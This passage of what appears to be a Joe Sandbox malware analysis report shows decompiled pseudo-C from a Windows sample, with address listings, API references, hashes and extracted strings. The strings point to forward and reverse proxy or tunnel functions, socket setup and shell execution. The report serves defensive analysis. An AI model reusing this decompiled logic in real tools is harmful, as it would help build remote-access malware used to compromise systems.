                    												}
                    												_t103 = _t246 + 8; // 0x8b56ff8b
                    												 *_t258 =  *_t103;
                    											}
                    											 *(_t246 + 0x18) = _t258[1];
                    											goto L38;
                    										}
                    										__eflags = _t244;
                    										if(_t244 != 0) {
                    											 *_t258 =  *(_t258 + _t244 * 8);
                    											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                    											 *(_t258 + _t244 * 8) = _v720;
                    											 *(_t258 + 4 + _t244 * 8) = _v708;
                    										}
                    										goto L27;
                    									}
                    									L38:
                    									_t173 = _t207 * 0xc;
                    									_t110 = _t173 + 0x45c448; // 0x410209
                    									 *0x4584ec(_t246);
                    									_t175 =  *((intOrPtr*)( *_t110))();
                    									_t228 = _v724;
                    									__eflags = _t175;
                    									if(_t175 == 0) {
                    										__eflags = _t228 - 0x4702a8;
                    										if(_t228 != 0x4702a8) {
                    											_t257 = _t207 + _t207;
                    											__eflags = _t257;
                    											asm("lock xadd [eax], ecx");
                    											if(_t257 != 0) {
                    												goto L43;
                    											} else {
                    												_t128 = _t257 * 8; // 0x30ff068b
                    												E00446172( *((intOrPtr*)(_t246 + _t128 + 0x28)));
                    												_t131 = _t257 * 8; // 0x30ff0c46
                    												E00446172( *((intOrPtr*)(_t246 + _t131 + 0x24)));
                    												_t134 = _t207 * 4; // 0xcf42
                    												E00446172( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
                    												_t231 = _v704;
                    												 *((intOrPtr*)(_v716 + _t246)) = _t231;
                    												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
                    											}
                    										}
                    										_t229 = _v732;
                    										 *_t229 = 1;
                    										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
                    									} else {
                    										 *(_v716 + _t246) = _t228;
                    										_t115 = _t207 * 4; // 0xcf42
                    										E00446172( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
                    										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
                    										E00446172(_v732);
                    										 *(_t246 + 8) = _v740;
                    										goto L1;
                    									}
                    									goto L2;
                    								}
                    							}
                    						} else {
                    							goto L2;
                    						}
                    						goto L47;
                    					}
                    					asm("sbb eax, eax");
                    					_t158 = _t157 | 0x00000001;
                    					__eflags = _t158;
                    					goto L10;
                    				} else {
                    					L1:
                    					L2:
                    					return E004349BB(_v8 ^ _t262);
                    				}
                    				L47:
                    			}

























































                    0x00444b6e
                    0x00444b76
                    0x00444b7d
                    0x00444b80
                    0x00444b81
                    0x00444b84
                    0x00444b88
                    0x00444b89
                    0x00444b8c
                    0x00444b9c
                    0x00444ba8
                    0x00444bbf
                    0x00444bc4
                    0x00444bc9
                    0x00444bde
                    0x00444be1
                    0x00444be1
                    0x00444be4
                    0x00444bea
                    0x00444bf3
                    0x00444bf5
                    0x00444bf8
                    0x00444bff
                    0x00444c02
                    0x00444c08
                    0x00000000
                    0x00000000
                    0x00444c0a
                    0x00444c0e
                    0x00444c37
                    0x00444c37
                    0x00444c10
                    0x00444c10
                    0x00444c14
                    0x00444c18
                    0x00444c1f
                    0x00444c25
                    0x00000000
                    0x00444c27
                    0x00444c27
                    0x00444c2a
                    0x00444c2d
                    0x00444c35
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00444c35
                    0x00444c25
                    0x00444c44
                    0x00444c44
                    0x00444c46
                    0x00444c4c
                    0x00444c52
                    0x00444c55
                    0x00444c55
                    0x00444c58
                    0x00444c5b
                    0x00444c5b
                    0x00444c6b
                    0x00444c79
                    0x00444c7e
                    0x00444c85
                    0x00444c87
                    0x00000000
                    0x00444c8d
                    0x00444c93
                    0x00444c99
                    0x00444ca0
                    0x00444ca6
                    0x00444ca9
                    0x00444caf
                    0x00444cbc
                    0x00444cc3
                    0x00444cc8
                    0x00444ccb
                    0x00444ccd
                    0x00444f26
                    0x00444f2c
                    0x00444f2d
                    0x00444f2e
                    0x00444f2f
                    0x00444f30
                    0x00444f31
                    0x00444f36
                    0x00444f37
                    0x00444f3c
                    0x00444cd3
                    0x00444cd3
                    0x00444ce1
                    0x00444ce4
                    0x00444cff
                    0x00444d06
                    0x00444d0c
                    0x00444d12
                    0x00444ce6
                    0x00444ce6
                    0x00444cee
                    0x00000000
                    0x00444cf0
                    0x00444cf0
                    0x00444cf6
                    0x00444cf6
                    0x00444cee
                    0x00444d19
                    0x00444d1c
                    0x00444e39
                    0x00444e3c
                    0x00444e49
                    0x00444e4c
                    0x00444e54
                    0x00444e54
                    0x00444e3e
                    0x00444e44
                    0x00444e44
                    0x00444d22
                    0x00444d22
                    0x00444d28
                    0x00444d30
                    0x00444d32
                    0x00444d35
                    0x00444d3e
                    0x00444d47
                    0x00444d4d
                    0x00444d4d
                    0x00444d50
                    0x00444d52
                    0x00000000
                    0x00000000
                    0x00444d54
                    0x00444d5a
                    0x00444d5b
                    0x00444d66
                    0x00444d6e
                    0x00444d76
                    0x00444d79
                    0x00444d7c
                    0x00444d82
                    0x00444d88
                    0x00444d8e
                    0x00444d94
                    0x00444d97
                    0x00000000
                    0x00000000
                    0x00444d99
                    0x00444dbe
                    0x00444dbe
                    0x00444dc1
                    0x00444dc5
                    0x00444dde
                    0x00444de3
                    0x00444de6
                    0x00444de8
                    0x00444dee
                    0x00444e29
                    0x00444df0
                    0x00444df0
                    0x00444df5
                    0x00444dfd
                    0x00444dfe
                    0x00444dfe
                    0x00444e15
                    0x00444e1c
                    0x00444e1f
                    0x00444e24
                    0x00444e24
                    0x00444e2c
                    0x00444e2f
                    0x00444e2f
                    0x00444e34
                    0x00000000
                    0x00444e34
                    0x00444d9b
                    0x00444d9d
                    0x00444da2
                    0x00444da8
                    0x00444db1
                    0x00444dba
                    0x00444dba
                    0x00000000
                    0x00444d9d
                    0x00444e57
                    0x00444e57
                    0x00444e5b
                    0x00444e63
                    0x00444e69
                    0x00444e6c
                    0x00444e72
                    0x00444e74
                    0x00444eb4
                    0x00444eba
                    0x00444ec1
                    0x00444ec1
                    0x00444ec7
                    0x00444ecb
                    0x00000000
                    0x00444ecd
                    0x00444ecd
                    0x00444ed1
                    0x00444ed6
                    0x00444eda
                    0x00444edf
                    0x00444ee6
                    0x00444ef4
                    0x00444efa
                    0x00444efd
                    0x00444efd
                    0x00444ecb
                    0x00444f0c
                    0x00444f14
                    0x00444f1d
                    0x00444e76
                    0x00444e7c
                    0x00444e7f
                    0x00444e86
                    0x00444e98
                    0x00444e9f
                    0x00444eac
                    0x00000000
                    0x00444eac
                    0x00000000
                    0x00444e74
                    0x00444ccd
                    0x00444c48
                    0x00000000
                    0x00444c48
                    0x00000000
                    0x00444c46
                    0x00444c3f
                    0x00444c41
                    0x00444c41
                    0x00000000
                    0x00444bcb
                    0x00444bcb
                    0x00444bcd
                    0x00444bdd
                    0x00444bdd
                    0x00000000

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                    • _memcmp.LIBVCRUNTIME ref: 00444E15
                    • _free.LIBCMT ref: 00444E86
                    • _free.LIBCMT ref: 00444E9F
                    • _free.LIBCMT ref: 00444ED1
                    • _free.LIBCMT ref: 00444EDA
                    • _free.LIBCMT ref: 00444EE6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID: C
                    • API String ID: 1679612858-1037565863
                    • Opcode ID: 8703082654152b9c440e2f93b54fe13bc1a882faecc646142371bbc8d7264624
                    • Instruction ID: d127cdb3de7c85a9d9654be553ddb5eee02a8e13bc8781a497adc22f61751268
                    • Opcode Fuzzy Hash: 8703082654152b9c440e2f93b54fe13bc1a882faecc646142371bbc8d7264624
                    • Instruction Fuzzy Hash: 00B12875A01219DFEB24DF19C884BAEB7B4FB48304F2445AEE949A7351D734AE90CF48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E00414517(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                    				intOrPtr _v0;
                    				char _v4;
                    				signed int _v8;
                    				signed short _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed short _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v48;
                    				signed int _t70;
                    				signed short _t81;
                    				signed int _t82;
                    				signed short _t85;
                    				signed short _t86;
                    				void* _t88;
                    				signed int _t97;
                    				signed char _t99;
                    				void* _t100;
                    				signed int _t107;
                    				signed short _t108;
                    				signed int _t110;
                    				signed int _t116;
                    				signed int* _t118;
                    				signed int _t119;
                    				signed int _t120;
                    				intOrPtr _t121;
                    
                    				_t110 = _a8;
                    				_t99 = 0;
                    				_t120 = _a4;
                    				_t97 = 0;
                    				_v28 = 0;
                    				_v16 = 0;
                    				_v32 = 0;
                    				_v4 = 0;
                    				_v12 = 0;
                    				_v24 = 0;
                    				_v8 = 0;
                    				_v20 = 0;
                    				_t119 = 0;
                    				_t118 = _a16;
                    				 *_t118 = 0;
                    				if(_t120 != 0 || _t110 != 0) {
                    					_t70 = _a12;
                    					__eflags = _t70;
                    					if(_t70 == 0) {
                    						L20:
                    						_a16 = _t97;
                    						__eflags = _t110;
                    						if(_t110 == 0) {
                    							L40:
                    							__eflags = _t120;
                    							if(_t120 == 0) {
                    								__eflags = _v28 & 0x00000001;
                    								_t100 = 0;
                    								_t72 =  !=  ? _t100 : 0x7f000001;
                    								__imp__#8(0x7f000001);
                    								_t121 =  !=  ? _t100 : 0x7f000001;
                    								L47:
                    								_t73 = E0041427A(_t97, _v20, __eflags, _v36, _t121);
                    								 *_t118 = _t73;
                    								__eflags = _t73;
                    								if(_t73 != 0) {
                    									__eflags = _v0 - _t119;
                    									if(_v0 == _t119) {
                    										L54:
                    										__eflags = _v28;
                    										if(_v28 == 0) {
                    											L57:
                    											return _t119;
                    										}
                    										_t119 = E0041449E(_v24,  *_t118);
                    										__eflags = _t119;
                    										if(_t119 == 0) {
                    											goto L57;
                    										}
                    										L56:
                    										E004144DC(_t73,  *_t118);
                    										 *_t118 =  *_t118 & 0x00000000;
                    										__eflags =  *_t118;
                    										goto L57;
                    									}
                    									 *_t73 =  *_t73 | 0x00000004;
                    									__eflags = _v32 & 0x00000002;
                    									if((_v32 & 0x00000002) == 0) {
                    										goto L54;
                    									}
                    									__imp__#12(_t121);
                    									 *((intOrPtr*)( *_t118 + 0x14)) = E004141FC(_t73);
                    									_t73 =  *_t118;
                    									__eflags =  *((intOrPtr*)(_t73 + 0x14)) - _t119;
                    									if( *((intOrPtr*)(_t73 + 0x14)) != _t119) {
                    										goto L54;
                    									}
                    									_t119 = 8;
                    									L53:
                    									__eflags = _t119;
                    									if(_t119 != 0) {
                    										goto L56;
                    									}
                    									goto L54;
                    								}
                    								_t119 = 8;
                    								goto L56;
                    							}
                    							__eflags = E00414234(_t120,  &_v4);
                    							if(__eflags != 0) {
                    								_t121 = _v4;
                    								goto L47;
                    							}
                    							_t73 = _v28;
                    							__eflags = _t73 & 0x00000004;
                    							if((_t73 & 0x00000004) == 0) {
                    								_push(_t118);
                    								_push(_t73 & 0x00000002);
                    								_push(_v32);
                    								_push(_v16);
                    								_t119 = E00414393(_t120, _t97);
                    								goto L53;
                    							}
                    							_t119 = 0x2af9;
                    							goto L56;
                    						}
                    						_t107 = E0043F2AA(_t99, _t110,  &_v12, 0xa) & 0x0000ffff;
                    						_t81 = _v12;
                    						_v32 = _t107;
                    						__eflags =  *_t81;
                    						if( *_t81 != 0) {
                    							__eflags = _t97;
                    							if(_t97 == 0) {
                    								L26:
                    								__imp__#55(_a8, "udp");
                    								__eflags = _t81;
                    								if(_t81 != 0) {
                    									_t85 =  *(_t81 + 8) & 0x0000ffff;
                    									_v28 = _t85;
                    									_t81 = _t85 & 0x0000ffff;
                    									_v40 = _t81;
                    								}
                    								L28:
                    								__eflags = _t97;
                    								if(_t97 == 0) {
                    									L30:
                    									__imp__#55(_v0, "tcp");
                    									_t116 = 1;
                    									__eflags = _t81;
                    									if(_t81 == 0) {
                    										L32:
                    										_t108 = _v24;
                    										_t82 = _v48;
                    										L33:
                    										__eflags = _t82;
                    										if(_t82 != 0) {
                    											__eflags = _t97;
                    											if(_t97 != 0) {
                    												goto L40;
                    											}
                    											__eflags = _t108;
                    											_t97 = (_t97 & 0xffffff00 | _t108 == 0x00000000) + 1;
                    											__eflags = _t108;
                    											if(_t108 == 0) {
                    												L39:
                    												_t48 =  &_v40;
                    												 *_t48 = _v40 & _t119;
                    												__eflags =  *_t48;
                    												goto L40;
                    											}
                    											__eflags = _v36 - _t119;
                    											if(_v36 == _t119) {
                    												goto L39;
                    											}
                    											_v40 = _t116;
                    											goto L40;
                    										}
                    										__eflags = _t97;
                    										_t84 =  !=  ? 0x277d : 0x2af9;
                    										return  !=  ? 0x277d : 0x2af9;
                    									}
                    									_t108 =  *(_t81 + 8) & 0x0000ffff;
                    									_t82 = _t108 & 0x0000ffff;
                    									_v48 = _t82;
                    									goto L33;
                    								}
                    								_t116 = 1;
                    								__eflags = _t97 - 1;
                    								if(_t97 != 1) {
                    									goto L32;
                    								}
                    								goto L30;
                    							}
                    							__eflags = _t97 - 2;
                    							if(_t97 != 2) {
                    								goto L28;
                    							}
                    							goto L26;
                    						}
                    						__imp__#9(_t107);
                    						_t86 = _t81 & 0x0000ffff;
                    						__eflags = _t97;
                    						_v24 = _t86;
                    						_v36 = _t86 & 0x0000ffff;
                    						_t88 = 1;
                    						_t97 =  ==  ? _t88 : _t97;
                    						__eflags = _a12;
                    						_v28 = 0 | _a12 == 0x00000000;
                    						goto L40;
                    					}
                    					__eflags =  *((intOrPtr*)(_t70 + 0x10)) - _t99;
                    					if( *((intOrPtr*)(_t70 + 0x10)) != _t99) {
                    						L23:
                    						return 0x2afb;
                    					}
                    					__eflags =  *((intOrPtr*)(_t70 + 0x14)) - _t99;
                    					if( *((intOrPtr*)(_t70 + 0x14)) != _t99) {
                    						goto L23;
                    					}
                    					__eflags =  *((intOrPtr*)(_t70 + 0x18)) - _t99;
                    					if( *((intOrPtr*)(_t70 + 0x18)) != _t99) {
                    						goto L23;
                    					}
                    					__eflags =  *((intOrPtr*)(_t70 + 0x1c)) - _t99;
                    					if( *((intOrPtr*)(_t70 + 0x1c)) != _t99) {
                    						goto L23;
                    					}
                    					_t99 =  *_t70;
                    					_v28 = _t99;
                    					__eflags = _t99 & 0x00000002;
                    					if((_t99 & 0x00000002) == 0) {
                    						L11:
                    						__eflags =  *((intOrPtr*)(_t70 + 4)) - _t97;
                    						if( *((intOrPtr*)(_t70 + 4)) == _t97) {
                    							L14:
                    							_t97 =  *(_t70 + 8);
                    							__eflags = _t97;
                    							if(_t97 == 0) {
                    								L19:
                    								_v16 =  *((intOrPtr*)(_t70 + 0xc));
                    								goto L20;
                    							}
                    							__eflags = _t97 - 1;
                    							if(_t97 == 1) {
                    								goto L19;
                    							}
                    							__eflags = _t97 - 2;
                    							if(_t97 == 2) {
                    								goto L19;
                    							}
                    							__eflags = _t97 - 3;
                    							if(_t97 == 3) {
                    								goto L19;
                    							}
                    							return 0x273c;
                    						}
                    						__eflags =  *((intOrPtr*)(_t70 + 4)) - 2;
                    						if( *((intOrPtr*)(_t70 + 4)) == 2) {
                    							goto L14;
                    						}
                    						return 0x273f;
                    					}
                    					__eflags = _t120;
                    					if(_t120 != 0) {
                    						goto L11;
                    					}
                    					return 0x2726;
                    				} else {
                    					return 0x2af9;
                    				}
                    			}
































                    0x0041451a
                    0x0041451e
                    0x00414522
                    0x00414526
                    0x00414528
                    0x0041452c
                    0x00414530
                    0x00414534
                    0x00414538
                    0x0041453c
                    0x00414540
                    0x00414544
                    0x00414549
                    0x0041454c
                    0x00414550
                    0x00414554
                    0x00414564
                    0x00414568
                    0x0041456a
                    0x004145e5
                    0x004145e5
                    0x004145e9
                    0x004145eb
                    0x004146e5
                    0x004146e5
                    0x004146e7
                    0x0041472a
                    0x00414736
                    0x00414737
                    0x0041473b
                    0x00414741
                    0x00414743
                    0x0041474e
                    0x00414753
                    0x00414755
                    0x00414757
                    0x0041475e
                    0x00414762
                    0x0041478f
                    0x0041478f
                    0x00414794
                    0x004147b1
                    0x00000000
                    0x004147b1
                    0x004147a1
                    0x004147a3
                    0x004147a5
                    0x00000000
                    0x00000000
                    0x004147a7
                    0x004147a9
                    0x004147ae
                    0x004147ae
                    0x00000000
                    0x004147ae
                    0x00414764
                    0x00414767
                    0x0041476c
                    0x00000000
                    0x00000000
                    0x0041476f
                    0x0041477e
                    0x00414781
                    0x00414783
                    0x00414786
                    0x00000000
                    0x00000000
                    0x0041478a
                    0x0041478b
                    0x0041478b
                    0x0041478d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041478d
                    0x0041475b
                    0x00000000
                    0x0041475b
                    0x004146f4
                    0x004146f6
                    0x00414724
                    0x00000000
                    0x00414724
                    0x004146f8
                    0x004146fc
                    0x004146fe
                    0x0041470a
                    0x00414710
                    0x00414711
                    0x00414717
                    0x00414720
                    0x00000000
                    0x00414720
                    0x00414700
                    0x00000000
                    0x00414700
                    0x004145fe
                    0x00414604
                    0x00414608
                    0x0041460c
                    0x0041460f
                    0x0041464a
                    0x0041464c
                    0x00414653
                    0x0041465c
                    0x00414662
                    0x00414664
                    0x00414666
                    0x0041466a
                    0x0041466e
                    0x00414671
                    0x00414671
                    0x00414675
                    0x00414675
                    0x00414677
                    0x00414680
                    0x00414689
                    0x00414691
                    0x00414692
                    0x00414694
                    0x004146a3
                    0x004146a3
                    0x004146a7
                    0x004146ab
                    0x004146ab
                    0x004146ae
                    0x004146c4
                    0x004146c6
                    0x00000000
                    0x00000000
                    0x004146c8
                    0x004146ce
                    0x004146cf
                    0x004146d2
                    0x004146e1
                    0x004146e1
                    0x004146e1
                    0x004146e1
                    0x00000000
                    0x004146e1
                    0x004146d4
                    0x004146d9
                    0x00000000
                    0x00000000
                    0x004146db
                    0x00000000
                    0x004146db
                    0x004146b0
                    0x004146bc
                    0x00000000
                    0x004146bc
                    0x00414696
                    0x0041469a
                    0x0041469d
                    0x00000000
                    0x0041469d
                    0x0041467b
                    0x0041467c
                    0x0041467e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041467e
                    0x0041464e
                    0x00414651
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00414651
                    0x00414612
                    0x00414618
                    0x0041461b
                    0x0041461d
                    0x00414624
                    0x0041462a
                    0x0041462b
                    0x00414630
                    0x00414637
                    0x00000000
                    0x00414637
                    0x0041456c
                    0x0041456f
                    0x00414640
                    0x00000000
                    0x00414640
                    0x00414575
                    0x00414578
                    0x00000000
                    0x00000000
                    0x0041457e
                    0x00414581
                    0x00000000
                    0x00000000
                    0x00414587
                    0x0041458a
                    0x00000000
                    0x00000000
                    0x00414590
                    0x00414592
                    0x00414596
                    0x00414599
                    0x004145a9
                    0x004145a9
                    0x004145ac
                    0x004145be
                    0x004145be
                    0x004145c1
                    0x004145c3
                    0x004145de
                    0x004145e1
                    0x00000000
                    0x004145e1
                    0x004145c5
                    0x004145c8
                    0x00000000
                    0x00000000
                    0x004145ca
                    0x004145cd
                    0x00000000
                    0x00000000
                    0x004145cf
                    0x004145d2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004145d4
                    0x004145ae
                    0x004145b2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004145b4
                    0x0041459b
                    0x0041459d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041455a
                    0x00000000
                    0x0041455a

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: tcp$udp
                    • API String ID: 0-3725065008
                    • Opcode ID: 659517a4cfa8e18b59678d4883f7380dc1021bf4e17a1c8ca98f1c9e23a4f5dc
                    • Instruction ID: dac7831d627436748a7a0845d2113fc890680b1c098ad5efc1299cd0cd119eb1
                    • Opcode Fuzzy Hash: 659517a4cfa8e18b59678d4883f7380dc1021bf4e17a1c8ca98f1c9e23a4f5dc
                    • Instruction Fuzzy Hash: B3719A746083029FDB24CF15C5846ABB7E1AFDA359F14442FF89587390EB78CD858B8A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E004112FE(void* __edx, void* __eflags, intOrPtr _a4) {
                    				char _v32;
                    				char _v56;
                    				void* _v60;
                    				char _v72;
                    				char _v76;
                    				char _v80;
                    				char _v88;
                    				char _v92;
                    				void* _v96;
                    				char _v108;
                    				char _v112;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr* _t26;
                    				char* _t34;
                    				char* _t37;
                    				intOrPtr _t50;
                    				char* _t51;
                    				char* _t58;
                    				intOrPtr _t60;
                    				char* _t65;
                    				void* _t68;
                    				intOrPtr _t121;
                    				void* _t125;
                    				void* _t128;
                    				void* _t130;
                    				void* _t131;
                    				void* _t133;
                    				void* _t135;
                    				signed int _t136;
                    				void* _t139;
                    				void* _t140;
                    				void* _t141;
                    				void* _t145;
                    
                    				_t147 = __eflags;
                    				_t111 = __edx;
                    				_push(_t68);
                    				_t121 = _a4;
                    				E004020F6(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
                    				SetEvent( *(_t121 + 0x24));
                    				_t26 = E00401FAB( &_v80);
                    				E004041A2( &_v80,  &_v56, 4, 0xffffffff);
                    				_t139 = (_t136 & 0xfffffff8) - 0x3c;
                    				E004020F6(0x473ec8, _t139, _t111, _t147, 0x473ec8);
                    				_t140 = _t139 - 0x18;
                    				E004020F6(0x473ec8, _t140, _t111, _t147,  &_v72);
                    				E0041B8B0( &_v112, _t111);
                    				_t141 = _t140 + 0x30;
                    				_t125 =  *_t26 - 0x46;
                    				if(_t125 == 0) {
                    					E00401E65( &_v88, _t111, _t135, __eflags, 1);
                    					_t34 = E0040247C();
                    					E00401FAB(E00401E65( &_v92, _t111, _t135, __eflags, 1));
                    					_t112 = _t34;
                    					_t37 = E00411AFB();
                    					_t127 = _t37;
                    					__eflags = _t37;
                    					if(__eflags == 0) {
                    						_t128 = _t141 - 0x18;
                    						_push("1");
                    						L19:
                    						_t111 = E00402F31( &_v32, E00401E65( &_v88, _t112, _t135, __eflags, 0), _t135, 0x473ec8);
                    						E00406383(0x473ec8, _t128, _t39, _t121, _t135, __eflags);
                    						_push(0x85);
                    						E00404AA1(_t121, _t39, __eflags);
                    						E00401FD8();
                    						L20:
                    						E00401E8D( &_v108, _t111);
                    						E00401FD8();
                    						E00401FD8();
                    						return 0;
                    					}
                    					 *0x471d50 = E00411D70(_t127, "StartForward");
                    					 *0x471d4c = E00411D70(_t127, "StartReverse");
                    					 *0x471d54 = E00411D70(_t127, "StopForward");
                    					_t50 = E00411D70(_t127, "StopReverse");
                    					_t112 = "GetDirectListeningPort";
                    					 *0x471d5c = _t50;
                    					_t51 = E00411D70(_t127, "GetDirectListeningPort");
                    					__eflags =  *0x471d50;
                    					 *0x471d58 = _t51;
                    					if(__eflags == 0) {
                    						L17:
                    						_t128 = _t141 - 0x18;
                    						_push("2");
                    						goto L19;
                    					}
                    					__eflags =  *0x471d4c;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					__eflags =  *0x471d54;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					__eflags = _t51;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					 *0x471d49 = 1;
                    					E004020F6(0x473ec8, _t141 - 0x18, "GetDirectListeningPort", __eflags, E00401E65( &_v88, "GetDirectListeningPort", _t135, __eflags, 0));
                    					_push(0x76);
                    					L10:
                    					E00404AA1(_t121, _t112, __eflags);
                    					goto L20;
                    				}
                    				_t130 = _t125 - 1;
                    				if(_t130 == 0) {
                    					_t58 =  *0x471d50(E0043B4A1(_t55, E00401FAB(E00401E65( &_v88, _t111, _t135, __eflags, 0))));
                    					_t145 = _t141 - 0x14;
                    					L9:
                    					_t112 = _t58;
                    					E0041B623(0x473ec8, _t145, _t58);
                    					_push(0x77);
                    					goto L10;
                    				}
                    				_t131 = _t130 - 1;
                    				if(_t131 == 0) {
                    					_t60 =  *0x471adc; // 0x7be108
                    					_t10 = _t60 + 0x18; // 0x7d7ac8
                    					_t11 =  *_t10 + 4; // 0xeed317d4
                    					__imp__#12( *_t11);
                    					_t65 =  *0x471d4c( *_t10, E0043B4A1(_t62, E00401FAB(E00401E65( &_v92, _t111, _t135, __eflags, 0))) & 0x0000ffff);
                    					__eflags = _t65;
                    					_t109 =  !=  ? 1 :  *0x471d4a & 0x000000ff;
                    					 *0x471d4a =  !=  ? 1 :  *0x471d4a & 0x000000ff;
                    					_t112 = _t65;
                    					E0041B623(0x473ec8, _t141 - 0x10, _t65);
                    					_push(0x78);
                    					goto L10;
                    				}
                    				_t133 = _t131 - 1;
                    				if(_t133 == 0) {
                    					_t58 =  *0x471d54();
                    					_t145 = _t141 - 0x18;
                    					goto L9;
                    				}
                    				if(_t133 == 1) {
                    					 *0x471d5c();
                    					 *0x471d4a = 0;
                    				}
                    				goto L20;
                    			}






































                    0x004112fe
                    0x004112fe
                    0x0041130b
                    0x0041130e
                    0x00411315
                    0x0041131d
                    0x00411327
                    0x0041133b
                    0x00411340
                    0x0041134b
                    0x00411350
                    0x0041135a
                    0x00411363
                    0x00411368
                    0x0041136b
                    0x0041136e
                    0x00411449
                    0x00411450
                    0x00411464
                    0x00411469
                    0x0041146d
                    0x00411472
                    0x00411474
                    0x00411476
                    0x00411523
                    0x00411525
                    0x0041152a
                    0x00411542
                    0x00411546
                    0x0041154c
                    0x00411553
                    0x0041155c
                    0x00411561
                    0x00411565
                    0x0041156e
                    0x00411577
                    0x00411584
                    0x00411584
                    0x0041148d
                    0x0041149e
                    0x004114af
                    0x004114b6
                    0x004114bb
                    0x004114c0
                    0x004114c7
                    0x004114cc
                    0x004114d3
                    0x004114d8
                    0x00411514
                    0x00411517
                    0x00411519
                    0x00000000
                    0x00411519
                    0x004114da
                    0x004114e1
                    0x00000000
                    0x00000000
                    0x004114e3
                    0x004114ea
                    0x00000000
                    0x00000000
                    0x004114ec
                    0x004114ee
                    0x00000000
                    0x00000000
                    0x004114f6
                    0x00411508
                    0x0041150d
                    0x00411437
                    0x00411439
                    0x00000000
                    0x00411439
                    0x00411374
                    0x00411377
                    0x00411423
                    0x00411429
                    0x0041142c
                    0x0041142c
                    0x00411430
                    0x00411435
                    0x00000000
                    0x00411435
                    0x0041137d
                    0x00411380
                    0x004113ad
                    0x004113b2
                    0x004113b5
                    0x004113b8
                    0x004113de
                    0x004113ee
                    0x004113f0
                    0x004113f6
                    0x004113fc
                    0x00411400
                    0x00411405
                    0x00000000
                    0x00411405
                    0x00411382
                    0x00411385
                    0x004113a2
                    0x004113a8
                    0x00000000
                    0x004113a8
                    0x0041138a
                    0x00411390
                    0x00411396
                    0x00411396
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Eventinet_ntoa
                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                    • API String ID: 3578746661-168337528
                    • Opcode ID: 22132d21eeccf538e6ba9496db498bd2150f94695e2f22510ea2ae49c5816a8d
                    • Instruction ID: 7844d9069da6a2c291da6eb0d3f0b305fb0541bbf23eb62b09bcb0d07407db94
                    • Opcode Fuzzy Hash: 22132d21eeccf538e6ba9496db498bd2150f94695e2f22510ea2ae49c5816a8d
                    • Instruction Fuzzy Hash: 26519331A042006BC614FB39D85A6AE37A5AB81744F40453FF906676F2EF3C9985CBDE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00417774(void* __edx, void* __eflags, char _a4, char _a28) {
                    				char _v28;
                    				struct _SHELLEXECUTEINFOA _v88;
                    				char _v112;
                    				char _v136;
                    				char _v316;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t33;
                    				void* _t41;
                    				intOrPtr _t50;
                    				signed int _t60;
                    				char* _t68;
                    				void* _t73;
                    				void* _t90;
                    				void* _t91;
                    
                    				_t94 = __eflags;
                    				_t33 = E00402093(_t60,  &_v136, __edx, _t90, "\\");
